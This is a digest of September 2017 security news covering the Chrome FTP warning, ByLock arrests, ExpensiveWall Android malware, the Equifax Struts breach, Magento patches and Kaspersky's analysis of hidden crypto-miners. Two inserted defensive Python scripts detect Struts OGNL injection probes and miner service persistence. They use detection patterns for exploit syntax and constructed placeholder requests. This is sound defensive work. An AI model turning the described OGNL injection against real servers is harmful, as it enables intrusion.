Google announced on Thursday that future versions of Chrome will label resources delivered via the File Transfer Protocol (FTP) as “Not secure.”

The change will be implemented starting with Chrome 63, currently scheduled for release in December 2017. The move is part of Google’s long-term plan to flag all non-secure connections in an effort to alert users and encourage website owners and administrators to migrate to HTTPS.

“We didn't include FTP in our original plan, but unfortunately its security properties are actually marginally worse than HTTP (delivered in plaintext without the potential of an HSTS-like upgrade),” Google software engineer Mike West explained.

West pointed out that FTP usage for top-level navigations was 0.0026% in the last month. In the case of downloads, roughly 5% were conducted over something other than HTTP/HTTPS, which could be FTP.

Google has encouraged website developers to migrate the downloads they offer, particularly for executable files, from FTP to HTTPS, and pointed as an example to the Linux Kernel Archives, which plans on terminating all FTP services by the end of the year.

Chrome developers have been discussing the possibility of removing built-in support for FTP since January 2014, but for the time being the use of the protocol will only be marked as “not secure.”


“When a feature gets usage that low, we generally start talking about removing it. Especially if it exposes attack surface or is fundamentally unsafe on the network, as FTP does and is,” said Google’s Chris Palmer.

FTP has been around in its current form since the 1980s. Support for the SSL and TLS protocols can be added via the FTP Secure (FTPS) extension, but FTPS is not supported by web browsers.

“As for FTPS, I'm glad it exists, but if we were going to focus on getting server operators to migrate to a new protocol, we would focus (and are focusing) on HTTPS,” Palmer added.


75,000 Turks Arrested So Far for Downloading Encrypted Messaging App
15.9.2017 thehackernews  BigBrothers

WARNING: If you are Turkish and using or have installed ByLock—a little-known encrypted messaging app—you could be detained by Turkish authorities.
You might be wondering why.
Because using this app in Turkey has been illegal since last year.
The background story begins here...
Remember Turkey's deadliest failed coup attempt?
In July 2016, a section of the Turkish military launched a coordinated operation—by deploying soldiers, tanks on the streets of major Turkish cities—to topple the government and unseat President Recep Tayyip Erdogan.
The Turkish government blamed Muhammed Fethullah Gülen, a Turkish preacher who lives in the United States, for leading the July 15-16 attempted coup, though Gülen denied any involvement.
In the aftermath of the coup attempt, Milli İstihbarat Teşkilatı (MİT), the Turkish intelligence agency, investigated and found that the ByLock messaging app had been used as a communication tool by tens of thousands of Gülen movement followers to coordinate the coup.

Since then the Turkish government has detained 75,000 people in an unprecedented crackdown for downloading the ByLock app, which has been declared illegal, according to the Guardian.
Those arrested include civil servants, judges, police officers, soldiers, homemakers, and businessmen who allegedly participated in the failed military coup attempt.
For those unaware, ByLock was one of the many encrypted messaging apps available to download for free on Apple's App Store and Google's Play Store and was downloaded over 600,000 times between April 2014 and April 2016, according to a report by British computer forensics expert, Thomas K. Moore.
It turns out that the Turkish authorities were able to crack ByLock because of its weak encryption algorithm and managed to decrypt 10 million encrypted messages, which led to evidence against thousands of rebels and undercover Gülenist operatives.
The Turkish government also believes that ByLock has been created by the Fetullahist Terrorist Organization (FETÖ), for delivering Gülen's messages among his followers as well as to instruct them on how to carry out plots against anti-Gülenists.
According to a legal opinion published in London, arresting people on the basis of just downloading an encrypted messaging app violates their human rights under Article 5 of the European Convention on Human Rights (ECHR), which guarantees the right to liberty.


Yet Another Android Malware Infects Over 4.2 Million Google Play Store Users
15.9.2017 thehackernews  Android

Even after so many efforts by Google, malicious apps have somehow managed to fool its Play Store's anti-malware protections and infect people with malicious software.
The same happened once again when at least 50 apps managed to make their way onto Google Play Store and were downloaded as many as 4.2 million times—one of the biggest malware outbreaks.
Security firm Check Point on Thursday published a blog post revealing at least 50 Android apps that were free to download on official Play Store and were downloaded between 1 million and 4.2 million times before Google removed them.
These Android apps come with a hidden malware payload that secretly registers victims for paid online services, sends fraudulent premium text messages from victims' smartphones and leaves them to pay the bill—all without the users' knowledge or permission.
Dubbed ExpensiveWall by Check Point researchers because it was found in the Lovely Wallpaper app, the malware comes hidden in free wallpaper, video or photo editing apps. It's a new variant of malware that McAfee spotted earlier this year on the Play Store.
But what makes ExpensiveWall different from the other variants is that it makes use of an advanced obfuscation technique the researchers call "packed," which compresses and encrypts the malicious code to evade Google Play Store's built-in anti-malware protections.
The researchers notified Google of the malicious apps on August 7, and the software giant quickly removed all of them, but within a few days the malware re-emerged on the Play Store and infected over 5,000 devices before it was removed four days later, Check Point said.
Here's How ExpensiveWall Malware Works:

Once an app with ExpensiveWall—which researchers think came from a software development kit called GTK—is downloaded onto a victim's device, the malicious app asks for the user's permission to access the Internet and to send and receive SMS messages.
The internet access is used by the malware to connect the victim's device to the attacker's command and control server, where it sends information on the infected handset, including its location alongside unique hardware identifiers, such as MAC and IP addresses, IMSI and IMEI numbers.
The C&C server then sends the malware a URL, which it opens in an embedded WebView window to download JavaScript code that begins to clock up bills for the victim by sending fraudulent premium SMS messages without their knowledge, and uses the victim's phone number to register for paid services.
However, according to the Check Point researchers, it is still unclear how much revenue was generated via ExpensiveWall's premium SMS scam.
Google's Play Store—Home for Malware
Android malware continues to evolve with more sophisticated and never-seen-before capabilities with every passing day, and spotting them on Google Play Store has become quite a common thing.
Last month, over 500 Android apps with spyware capabilities were found on Play Store, which had been downloaded more than 100 million times.
In July, Lipizzan spyware apps were spotted on Play Store that can steal a whole lot of information on users, including text messages, emails, voice calls, photos, location data, and other files, and spy on them.
In June, more than 800 Xavier-laden apps were discovered on Google Play that had been downloaded millions of times, and the same month researchers found first code injecting rooting malware making rounds on Google Play Store.
A month prior to it, researchers spotted 41 apps on Play Store hidden with the Judy Malware that infected 36.5 million Android devices with malicious ad-click software.
In April, over 40 apps with hidden FalseGuide malware were spotted on Play Store that made 2 Million Android users victims.
Earlier this year, researchers also discovered a new variant of the HummingBad malware, dubbed HummingWhale, hidden in more than 20 apps on Google Play Store, which were downloaded by over 12 Million users.
How to Protect Your Android From Such Malware Apps
Even after Google removed all the malware-tainted apps from its official Play Store marketplace, your smartphone will remain infected with the ExpensiveWall malware until you explicitly uninstall the malicious apps, if you have downloaded any.
Google has recently provided a security feature known as Play Protect that uses machine learning and app usage analysis to automatically remove malicious apps from the affected smartphones to prevent further harm.
However, according to the Check Point researchers, many phones run an older version of Android that does not support the feature, leaving a wide audience open to malware attacks.
You are strongly advised to always keep a good antivirus app on your device that can detect and block any malicious app before it can infect your device, and always keep your device and all apps up-to-date.


CVE-2017-5638 Apache Struts vulnerability is the root cause behind Equifax data breach
15.9.2017 securityaffairs Vulnerebility

It’s official: the Equifax data breach was caused by the exploitation of the CVE-2017-5638 Apache Struts vulnerability.
The Equifax data breach case is now solved; the incident was caused by the exploitation of the CVE-2017-5638 Apache Struts vulnerability. The vulnerability affects the Jakarta Multipart parser upload function in Apache Struts and could be exploited by an attacker sending a maliciously crafted request to a vulnerable web server. Just after the experts from Cisco Talos publicly disclosed it, proof-of-concept exploit code for Metasploit was made available, allowing anyone to launch public scans. Attacks leveraging the flaw spiked, and in one case crooks exploited it to deliver Cerber ransomware to vulnerable servers.
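As an added defensive example (not the article’s, Equifax’s or Apache’s code): a scanner that flags CVE-2017-5638 exploitation attempts in captured HTTP requests. The vector for this CVE is an OGNL expression (`%{...}`) placed in the Content-Type header that the Jakarta Multipart parser echoes into an error message and evaluates (S2-045); the S2-046 variant of the same CVE puts it in a part’s Content-Disposition filename. The request samples below are constructed and the hostnames are placeholders.

```python
"""Flag CVE-2017-5638 (Apache Struts S2-045 / S2-046) probes in raw HTTP requests.

Added example, not code from the article, Equifax or Apache. A browser only
ever sends a MIME type in Content-Type, so OGNL syntax in that header (or in a
multipart part's Content-Disposition) is a reliable detection signal.
"""
import re

# OGNL expression syntax and context objects that never belong in a MIME header.
OGNL_MARKERS = re.compile(
    r"%\{|\$\{|#_memberAccess|ognl\.OgnlContext|@java\.lang\.|#context\b", re.I
)
# Headers the Jakarta Multipart parser processes: the request's Content-Type
# (S2-045) and each body part's Content-Disposition (S2-046).
HEADER_RE = re.compile(r"^(Content-Type|Content-Disposition):[ \t]*(.*)$", re.I | re.M)
# Shape of a well-formed multipart Content-Type (RFC 2046 boundary characters).
MULTIPART_OK = re.compile(
    r"^multipart/form-data;\s*boundary=[A-Za-z0-9'()+_,./:=?-]{1,70}$", re.I
)


def scan_request(raw):
    """Return a list of (header, value, reason) for suspicious header lines."""
    hits = []
    for m in HEADER_RE.finditer(raw):
        name, value = m.group(1), m.group(2).rstrip("\r")
        if OGNL_MARKERS.search(value):
            hits.append((name, value, "OGNL expression markers"))
        elif (name.lower() == "content-type"
              and value.lower().startswith("multipart/")
              and not MULTIPART_OK.match(value)):
            # Not an exploit by itself, but the parser path the CVE lives in.
            hits.append((name, value, "malformed multipart Content-Type"))
    return hits


def scan_requests(requests):
    """Scan a {label: raw_request} mapping; an empty list means clean."""
    return {label: scan_request(raw) for label, raw in requests.items()}


# --- constructed samples (no real exploit payload) ---------------------------
LEGIT_UPLOAD = (
    "POST /doUpload.action HTTP/1.1\r\n"
    "Host: struts-app.example.invalid\r\n"
    "Content-Type: multipart/form-data; boundary=----constructedBoundary42\r\n"
    "Content-Length: 245\r\n\r\n"
    "------constructedBoundary42\r\n"
    'Content-Disposition: form-data; name="upload"; filename="report.pdf"\r\n'
    "Content-Type: application/pdf\r\n\r\n"
)
CONTENT_TYPE_PROBE = (  # S2-045 shape: OGNL where the MIME type should be
    "POST /doUpload.action HTTP/1.1\r\n"
    "Host: struts-app.example.invalid\r\n"
    "Content-Type: %{#constructed_marker}\r\n"
    "Content-Length: 0\r\n\r\n"
)
DISPOSITION_PROBE = (  # S2-046 shape: OGNL in a part's filename
    "POST /doUpload.action HTTP/1.1\r\n"
    "Host: struts-app.example.invalid\r\n"
    "Content-Type: multipart/form-data; boundary=----constructedBoundary42\r\n"
    "Content-Length: 180\r\n\r\n"
    "------constructedBoundary42\r\n"
    'Content-Disposition: form-data; name="upload"; filename="%{#constructed_marker}"\r\n'
    "Content-Type: text/plain\r\n\r\n"
)

if __name__ == "__main__":
    results = scan_requests({"legit": LEGIT_UPLOAD, "s2-045": CONTENT_TYPE_PROBE,
                             "s2-046": DISPOSITION_PROBE})
    for label, hits in results.items():
        print(label, "->", hits or "clean")
```

A WAF or IDS rule built on the same markers is the quickest stopgap when the Struts upgrade itself will take weeks, as Williams describes further down.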

The vulnerability was fixed back in March, but the company did not update its systems; this was also confirmed by an Apache spokeswoman to the Reuters agency.

The Equifax website was updated only on Wednesday, while the company and law enforcement were still investigating the incident.

“Equifax has been intensely investigating the scope of the intrusion with the assistance of a leading, independent cybersecurity firm to determine what information was accessed and who has been impacted. We know that criminals exploited a U.S. website application vulnerability. The vulnerability was Apache Struts CVE-2017-5638. We continue to work with law enforcement as part of our criminal investigation, and have shared indicators of compromise with law enforcement.” reads the statement published by the company on its website.


Shortly after the Equifax data breach, security experts pointed out different possible causes for the incident, including the possible exploitation of the recently fixed CVE-2017-9805 Apache Struts vulnerability or a still unknown zero-day flaw.

Last week, security researchers with the firm Baird published a report that supported the hypothesis that a Struts vulnerability was exploited in the hack, but did not specify which one the hackers used.

Jeff Williams, CTO of Contrast Security, suggested on Saturday that CVE-2017-5638 was likely the root cause of the Equifax data breach.

“The first vulnerability from March seems much more likely because it’s easier to exploit and much better known. It also fits the timeline better, since it was released months before Equifax was attacked in July,” Williams wrote. “The process of rewriting, retesting, and redeploying can take months. I just visited one of the largest telecom providers where this effort took more than four months and millions of dollars. Without runtime protection in place, they have to do this every time a new library vulnerability comes out.”

Last week, U.S. Sen. Mark Warner (D-VA) asked the Federal Trade Commission to investigate the security breach and verify the cybersecurity safeguards adopted by the company.

“The volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize,” Warner wrote, “In ways similar to the financial service industry’s systemic risk designation, I fear that firms like Equifax may illustrate a set of institutions whose activities, left unchecked, can significantly threaten the economic security of Americans.”


Scammers Offer to Sell Data Stolen in Equifax Hack

15.9.2017 securityweek CyberCrime
While the large amount of information stolen in the recent Equifax hack might be up for sale somewhere on the dark web, scammers have also set up websites offering the data from the U.S. credit reporting agency.

Equifax alerted customers on September 7 that hackers had accessed its systems between mid-May and late July. The breach affects roughly 143 million U.S. consumers and involves names, social security numbers, dates of birth, addresses and, in some cases, driver’s license numbers, credit card numbers and dispute documents. Equifax has confirmed that an Apache Struts vulnerability was used in the attack.

Security experts believe the attackers will likely try to sell the data and warned users to be on the lookout for phishing attempts and scams.

The U.S. Federal Trade Commission (FTC) has launched an investigation into the massive data breach, and released an alert regarding scam phone calls from people claiming to represent Equifax.

Shortly after Equifax disclosed the breach, various individuals started claiming to possess the stolen data. One hacker with the online moniker “1x0123,” who had previously been credited for finding vulnerabilities in software and websites, offered to sell access to Equifax servers on Twitter, but later locked his account after more reputable researchers pointed out that he was a scammer.

One of the first scam websites emerged on the Tor anonymity network hours after Equifax made the announcement. The individuals who had set up the site wanted Equifax to pay them 600 bitcoin (at the time worth roughly $2.7 million) to prevent the public release of all the data – except the credit card numbers – on September 15.

After several experts pointed out that it was likely a scam or a hoax, the operator of the service hosting the Tor website shut them down.

A more recent attempt to allegedly sell the Equifax data comes from a group calling itself “Equihax.” They offered to release all the data via a crowdfunding effort whose goal was 600 bitcoin or 8,400 Ethereum. They also offered to sell 1 million data entries for 4 bitcoin ($12,500).

In order to prove that they are in possession of the Equifax data, they leaked the records of three individuals – Donald Trump, Kim Kardashian and Bill Gates – and posted various screenshots apparently showing that they had access to the credit reporting agency’s systems.


While they convinced some people that their claims are legitimate, others pointed out that this, too, is likely a scam. The first hint is that the details of Trump, Kardashian and Gates were posted online some time ago, and when Ars Technica’s Sean Gallagher and others pointed out that Gates’ residence is not in Wisconsin as the leaked records showed, the “hackers” changed it to Washington.

The format of the data does suggest that it has been extracted from a database, but the data could easily have been forged, considering that only a small sample has been provided.

As for the screenshots, they allegedly show several administration panels used by Equifax, but these, too, could have been easily forged or taken from another location. For example, one of the screenshots does reference Equifax, but most of the domains and paths appear to be related to the Royal Bank of Canada.

Fake Equifax hack


U.S. Politicians Demand Probe of Equifax After Hack

15.9.2017 securityweek CyberCrime
A senior US senator called Wednesday for a federal investigation of credit rating agency Equifax after the company lost the personal data of 143 million customers to hackers.

Senator Mark Warner asked the Federal Trade Commission, one of the few bodies with oversight powers over loosely-regulated credit raters, to examine Equifax's security practices and its "widely-panned response" to consumers potentially impacted by the breach.

Warner, a member of the powerful Senate Banking Committee, accused the company of "exceptionally poor cybersecurity practices" that continued even after the hack became known.

He also said the company's woeful response to people whose data may have been lost -- including trying to charge them for protection -- was "alarming".

"The volume and sensitivity of the data potentially involved in this breach raises serious questions about whether firms like Equifax adequately protect the enormous amounts of sensitive data they gather and commercialize."

Equifax is one of the three major firms which collect consumers' financial data in order to rate their credit-worthiness to banks, home sellers, auto sellers and others who depend on consumer credit in marketing.

The data the company admitted to losing on September 7 includes people's names, social security numbers, addresses, credit card numbers, and other financial details.

Such data is often used by criminals to steal people's identities for financial gain.

Although crucial to the smooth functioning of the US banking industry, credit rating agencies are little regulated, and Warner called for the FTC to take a stronger oversight role.

US officials are investigating the data hack but would not say Wednesday if they knew who was behind it, though foreign hackers are widely suspected.

The breach took place from mid-May through July 2017 via a website application vulnerability that US cyber security companies say they had identified in March.

Congress has expressed outrage at the hack and the company's management of it. Particular anger has been aimed at allegations that three Equifax officials sold their stock in the company before the hack was made public.

On Monday Senate Finance Committee Chairman Orrin Hatch and Ranking Member Ron Wyden called on Equifax to explain the breach and its actions to the committee.

"The scope and scale of this breach appears to make it one of the largest on record, and the sensitivity of the information compromised may make it the most costly to taxpayers and consumers," they told Equifax in a letter.


Magento Patches Critical Vulnerability in eCommerce Platforms

15.9.2017 securityweek Vulnerebility
Magento this week released updates for Magento Commerce and Open Source 2.1.9 and 2.0.16 to address numerous vulnerabilities, including a remote code execution bug rated Critical severity.

Featuring a CVSSv3 score of 8.2, the remote code execution flaw impacts content management system (CMS) and layouts. The vulnerability allows an administrator with limited privileges to introduce malicious code when creating a new CMS page, which would potentially result in arbitrary remote code execution.

The bug affects Magento Open Source prior to 1.9.3.6, Magento Commerce prior to 1.14.3.6, Magento 2.0 prior to 2.0.16, and Magento 2.1 prior to 2.1.9 and has been addressed in Magento Open Source 1.9.3.6, Magento Commerce 1.14.3.6, SUPEE-10266, Magento 2.0.16, and Magento 2.1.9, the company notes in an advisory.

The new patches also address three High severity vulnerabilities affecting Magento 2.0 prior to 2.0.16 and Magento 2.1 prior to 2.1.9. These bugs are an information leak in the theme creation function, an arbitrary delete issue, and a remote code execution caused by arbitrary file delete and lack of input sanitization in the Magento functional tests.

The update also resolves a total of 28 Medium risk vulnerabilities, including abuse of functionality, information leak, Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS, stored), unvalidated redirection, remote code execution, insufficient session expiration, Denial of Service (DoS), and Insecure Direct Object Reference (IDOR).

Some of the flaws could be exploited by an attacker to obtain order information, exploit other vulnerabilities, redirect users to an external site, launch Man-in-the-middle attacks, retrieve information about past orders, or re-use cookies.

Other bugs, however, can be exploited by local admins to arbitrarily overwrite sensitive files; create URLs for CSRF attacks; inject code or executable scripts; inject code for an XSS attack; add files containing injected code; or modify page counter to prevent the creation of new pages.

Magento also addressed two Low risk vulnerabilities, namely a bug in account lockout mechanism, which leaks a Magento site's contact e-mail, and an IDOR that allows a logged-in user to modify order fields that they do not have permission to view.


Mocana Integrates Embedded Security Software With Industrial Cloud Platforms

15.9.2017 securityweek Security
Mocana Integrates Embedded Security Software with AWS IoT, Microsoft Azure IoT, and VMware Liota to Protect Devices

Two constants in current cybersecurity are the growing threat from insecure IoT botnets (Mirai, WireX, etc.) and the continuing security provided by strong encryption. It is part of the mission of one venture capital funded firm to solve the former by use of the latter.

Mocana was formed in 2002 as an embedded security software company for military applications. With the help of venture capital ($11 million in May 2017 brought the total to $93.6 million), it has expanded into ICS and both the industrial internet of things (IIoT) and consumer IoT.


"We're a crypto company," Mocana's CTO Dean Weber told SecurityWeek. "While traditional security has been to provide barriers and layers of network controls -- even for IoT devices -- we offer a different approach. We use cryptography to build a trust platform for IoT, mobile and industrial devices."

The trust platform is provided as source code to device developers, who compile it into different target devices. "We're building in trustworthiness from the ground up," explains Weber. At a simple level, it can be viewed as a replacement for the widely used and hugely abused OpenSSL. Mocana comes in at about one-sixth the size of OpenSSL, and says Weber, "is an order of magnitude faster." It has, since 2002, never had a Common Vulnerabilities and Exposures (CVE) vulnerability cataloged, while OpenSSL has received around 250.

"OpenSSL provides a cryptographic library that gets calls from applications to provide services as necessary. We replace that," explains Weber, "but we do a lot more than OSSL because we start from a root of trust on the platform, and we build an X509 trust chain. The device ends up with a trust value. That trust value represents the cryptographic trustworthiness of the platform. We're building the foundation on a device, which could be an edge device, a sensor, an activator, a switch, a gravitometer, or a flow meter, or accelerometer or whatever."

In effect, a cryptographically trusted edge or IIoT device can communicate securely with its device controller. "Traditionally, that device is going to talk to a gateway service, which may be a PLC or RTU, which would then be connected to a back-end service," says Weber, who is set to speak at SecurityWeek's upcoming ICS Cyber Security Conference. "In the industrial space that would be the ICS SCADA; in the IoT space that might be a cloud service where you bring everything together for analytics or management, or both. At each one of those layers we can provide a trust platform that guarantees through the strength of the cryptography chosen (and we support many different types of crypto) that this communication/device is secure because the crypto is intact."

In the world of consumer IoT devices, any successful infection of the device with a bot will break the chain of trust and outbound traffic can be blocked. In ICS, the integrity of both the IIoT device and its communication with the SCADA device can be guaranteed. In the commercial world, Mocana this week announced that it has verified the integration of its IoT Security Platform with the IoT cloud platforms of Amazon Web Services, Microsoft Azure IoT, and VMware.

"Digital transformation is driving the adoption of IoT technologies that can measure the performance and status of billions of connected devices," says Vikrant Ghandhi, industry director, digital transformation at Frost & Sullivan. "Mocana's IoT Security Platform ensures that IoT devices can be trusted and communicate securely to the public and industrial cloud platforms. Their verification of the interoperability and integration of their cloud to AWS, Microsoft Azure IoT, VMWare-based clouds, and GE Predix is a significant benefit for companies working with Mocana."

Mocana works in the greenfield space -- it helps developers produce new secure devices. This is problematic for many devices already in the field -- especially in the ICS world where IT teams do not like to disturb production devices. Nevertheless, explains Weber, "Customers can get an upgrade if the existing device has either an OpenSSL cryptographic library in place, or sufficient processing power to accommodate Mocana's one. In some of the older brownfield sites there may not be the computer power to run a cryptographic stack. In that case there's not a lot we can do for them other than start to apply our security in the next hop up in the industrial or commercial network. We can develop unique identities for each one of those devices -- at least most of the devices can handle a certificate as a function of identity -- not all, but most."

Mocana makes it as easy as possible for developers to replace OpenSSL in existing devices. It has mapped OpenSSL APIs onto its own cryptographic library, so that the OpenSSL library can simply be replaced by the Mocana library. The device will continue to function without further changes, but using Mocana's secure software without running the risks associated with OpenSSL's known vulnerabilities.

Mocana describes its IoT platform as providing 'military grade' protection. This is a term often used without any justification by companies claiming to provide strong security. In Mocana's case, it is perfectly accurate. Mocana technology is already used inside fighter jets, helicopters, commercial aircraft, oil refineries, water systems, electric smart grids, smart buildings and smart cities.


Trump Blocks Chinese Acquisition of U.S. Semiconductor Firm

15.9.2017 securityweek BigBrothers
President Donald Trump on Wednesday blocked attempts by a Chinese state-owned firm to acquire an American semiconductor manufacturer on national security concerns, drawing a rebuke from Beijing.

The acquisition of Lattice Semiconductor Corporation, a publicly-traded Oregon company, by Chinese-owned Canyon Bridge Fund could endanger the US government's use of sensitive products the company produces, the Treasury Department said in a statement.

The Trump administration has adopted an aggressive stance towards China on trade and national security matters, launching wide-ranging investigations into the national security ramifications of Beijing's trade in aluminum and steel.

Trump has the authority to block foreign investments he deems national security threats through the Committee on Foreign Investments in the United States, an interagency committee.

In the case of Lattice, CFIUS and the president decided "the transaction poses a risk to the national security of the United States that cannot be resolved through mitigation," the Treasury said in a statement.

The decision prohibited Canyon Bridge, its partner Yitai Capital and Yitai's parent, the China Venture Capital Fund Corp (CVCF), from purchasing the US firm, which serves the consumer, communications and industrial markets.

The Treasury said the deal posed a national security risk due to Beijing's support for the transaction, the potential transfer of intellectual property to the foreign investors, and the importance of the semiconductor supply to the US government, including Lattice's products.

China's Ministry of Commerce expressed "concern" over the decision Thursday.

Spokesman Gao Feng told reporters at a regular press briefing that while each country has a right to probe investments in "sensitive fields", the power should not be used as "an instrument for implementing protectionism."

China "hopes relevant countries can treat Chinese companies' overseas acquisitions objectively and impartially, give fair treatment to such normal business practices, and create a reasonable and transparent business environment to avoid impacting investors' confidence," he said, according to a transcript of the remarks on the ministry's website.

Lattice manufactures programmable logic devices, which are semiconductors that can be programmed to provide functions similar to chips, the statement said.

Trump personally intervened in the process after the companies appealed to him directly to overrule the CFIUS ruling, according to The Wall Street Journal.

Trump's predecessor, Barack Obama, had also intervened to prevent a similar deal involving semiconductors on security concerns last year.

Chinese government-backed Grand Chip Investment scrapped plans to buy German semiconductor equipment maker Aixtron in December after Washington rejected the inclusion of Aixtron's US unit over fears it could put sensitive technology with potential military applications in Chinese hands.

"It is important to note that the US government has been particularly concerned with foreign investment, particularly Chinese investment, into the US semiconductor industry for years," said Lawrence Ward, a partner at the international law firm Dorsey & Whitney in global business focusing on US national security law.

"It is likely premature to think that the Trump administration is taking a hawkish approach to Chinese investment across all industry sectors but, of course, only time will tell," Ward said.


Miners on the Rise
15.9.2017 Kaspersky Virus
Miners are a class of malware whose popularity has grown substantially this year. The actual process of cryptocurrency mining is perfectly legal, though there are groups of people who hoodwink unwitting users into installing mining software on their computers, or exploit software vulnerabilities to do so. This results in threat actors receiving cryptocurrency, while their victims’ computer systems experience a dramatic slowdown. Over the last month alone, we have detected several large botnets designed to profit from concealed crypto mining. We have also observed growing numbers of attempts to install miners on servers owned by organizations. When these attempts are successful, the companies’ business processes suffer because data processing speeds fall substantially.

In general, the number of users that have encountered cryptocurrency miners has increased dramatically in recent years. For example, in 2013 our products protected around 205,000 users globally when they were targeted by this type of threat. In 2014 the number increased to 701,000, and the number of attacked users in the first eight months of 2017 reached 1.65 million.
 

Number of users Kaspersky Lab protected from malicious cryptocurrency miners from 2011 to 2017

Propagation methods

The main method for installing miners makes use of adware installers that are spread using social engineering. There are also more sophisticated propagation methods – one is exploiting vulnerabilities such as EternalBlue. In that case, the victim is a server, which is especially advantageous for the threat actors because they end up with a more powerful asset.

The following types of ads can be found in the Telegram messaging service:
 

Advert for a mining builder in a Telegram channel advertising opportunities to earn money online

By following the advertised link, the user can download a trial version of a builder which assembles a dropper for a miner with some extra features, including suspension of the software whenever the user launches a popular game.
 

The miner’s builder

To receive the full version, the user is prompted to contact the administrators of a group on the VKontakte social media site.

Main principles of operation

Concealed miners are very difficult to detect due to their specific nature and operating principles. Any user can independently install this kind of software on their computer and legally use it for mining a cryptocurrency.

Often, a crypto miner comes with extra services to maintain its presence within the system, automatic launch every time the computer is switched on, and concealed operation.

These services can, for example:

Try to turn off security software;
Track all application launches, and suspend their own activities if a program is started that monitors system activities or running processes;
Ensure a copy of the mining software is always present on the hard drive, and restore it if it is deleted.

 

We recently detected a network containing an estimated 5,000+ computers on which Minergate, a legal console miner, was installed without the users’ knowledge or consent. The software was distributed via an adware installer, and was installed as a service on the victim computer in the following way:
 

Minergate installation

The user downloads an installer from a file hosting service under the guise of a freeware program or keys to activate licensed products;
When launched, the installer downloads the miner’s dropper (exe) to the victim computer;
The dropper writes Minergate and the tool exe to the hard drive, using srvany.exe when the system boots to launch the miner as a service named windows driver.exe;
The dropper creates an additional service named exe which ensures the continuous operation of Minergate; if Minergate is deleted, the dropper restores it on the hard drive.
The dropper stores the miner configuration info in a registry record.
 

MinerGate’s configuration data
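The service-based persistence described in the installation steps above can be hunted for on a suspect host. The following Python script is an added example and not Kaspersky's code; it runs over constructed service and registry records (every path and name other than srvany.exe and MinerGate is made up) and flags a srvany-wrapped binary under a system-looking service name, a companion service that shares its directory, and wallet or pool strings left behind in the registry.

```python
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass
class ServiceRecord:
    name: str              # service name as registered with the SCM
    image_path: str        # ImagePath: the binary the service manager launches
    start_type: str        # "auto" or "manual"
    application: str = ""  # srvany's Parameters\Application value, if any


# Names that imitate a Windows component without being one ("windows driver.exe").
LOOKALIKE = re.compile(r"^(windows|microsoft|system)[\s_-]*driver(\.exe)?$", re.I)
USER_WRITABLE = re.compile(r"\\(users|programdata|appdata|temp)\\", re.I)
MINER_HINTS = ("minergate", "xmr", "monero", "stratum", "cpuminer")
# Standard Monero addresses are 95 base58 characters starting with '4'.
MONERO_ADDR = re.compile(r"\b4[1-9A-HJ-NP-Za-km-z]{94}\b")
POOL_URL = re.compile(r"stratum\+tcp://[\w.\-]+:\d+", re.I)


def score_service(svc):
    """Return the indicators a single service record exhibits."""
    findings = []
    launched = f"{svc.image_path} {svc.application}".lower()
    if svc.image_path.lower().rstrip('"').endswith("srvany.exe"):
        findings.append("srvany.exe wrapper runs an arbitrary program as a service")
    if LOOKALIKE.match(svc.name.strip()):
        findings.append("service name imitates a Windows component")
    if USER_WRITABLE.search(launched):
        findings.append("service binary lives in a user-writable directory")
    if any(hint in launched for hint in MINER_HINTS):
        findings.append("binary name matches a known miner")
    return findings


def find_watchdog_pairs(services):
    """Groups of auto-start services whose binaries share a directory outside
    System32: the second service that restores the miner if it is deleted."""
    by_dir = {}
    for svc in services:
        if svc.start_type != "auto":
            continue
        target = (svc.application or svc.image_path).strip('"')
        directory = str(PureWindowsPath(target).parent).lower()
        if "\\windows\\system32" in directory:
            continue
        by_dir.setdefault(directory, set()).add(svc.name)
    return [names for names in by_dir.values() if len(names) >= 2]


def inspect_registry_values(values):
    """values: registry value name -> data. Flags the wallet and pool strings a
    dropper leaves behind when it stores the miner configuration in the registry."""
    hits = []
    for name, data in values.items():
        if MONERO_ADDR.search(data):
            hits.append((name, "Monero wallet address"))
        if POOL_URL.search(data):
            hits.append((name, "mining pool URL"))
    return hits


def hunt(services, registry_values):
    """Combine the three checks into one report for a host."""
    scored = {svc.name: score_service(svc) for svc in services}
    return {
        "suspicious_services": {n: f for n, f in scored.items() if f},
        "watchdog_pairs": find_watchdog_pairs(services),
        "registry_hits": inspect_registry_values(registry_values),
    }


# Constructed sample, shaped like an SCM/registry export from a host infected the
# way the steps above describe; the user name, directory and wallet are made up.
FAKE_WALLET = "4" + ("AbCd1234" * 12)[:94]
SAMPLE_SERVICES = [
    ServiceRecord("Dhcp", r"C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted", "auto"),
    ServiceRecord("windows driver.exe", r"C:\Users\alice\AppData\Roaming\mgate\srvany.exe", "auto",
                  application=r"C:\Users\alice\AppData\Roaming\mgate\minergate-cli.exe"),
    ServiceRecord("wdrv-guard", r"C:\Users\alice\AppData\Roaming\mgate\wdrv-guard.exe", "auto"),
    ServiceRecord("Spooler", r"C:\Windows\System32\spoolsv.exe", "auto"),
]
SAMPLE_REGISTRY = {
    "Parameters\\AppParameters": f"-user {FAKE_WALLET} -xmr 2 -o stratum+tcp://pool.example.invalid:3333",
    "Parameters\\Application": r"C:\Users\alice\AppData\Roaming\mgate\minergate-cli.exe",
}

if __name__ == "__main__":
    for section, result in hunt(SAMPLE_SERVICES, SAMPLE_REGISTRY).items():
        print(f"{section}: {result}")
```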

Moneymaking scheme

The two currencies most often used in concealed mining are monero (XMR) and zcash. These two ensure the anonymity of transactions, which comes in very handy for threat actors.

According to the most conservative estimates, the mining network can generate anything up to $30,000 a month for its owners.
 

The wallet of a mining botnet

The above screenshot shows a wallet coded into the miner’s configuration data. At the time of writing, a total of 2,289 XMR had been transferred from this wallet, which at the current exchange rate is equivalent to $208,299.

Assuming a regular desktop computer yields a hash rate of 30-100 H/sec, this botnet may comprise in the region of 4,000 computers.
 

Hash rates of the mining botnet plotted against time

Conclusion

As we see, threat actors will grasp any opportunity to make illegal money, and the methods to make money online are continuously evolving. The development of the cryptocurrency market has led to an explosive growth in cases where miners are installed without users’ knowledge or consent. This can be explained by the fact that when a new cryptocurrency is emerging, it is much easier to mine and make money from it. Threat actors are on the lookout for ways to use the resources of somebody else’s hardware, and often it is regular users who fall victim.

Kaspersky Lab’s solutions detect all the threats described in this article under the verdicts:

Win32.BitCoinMiner.hxao
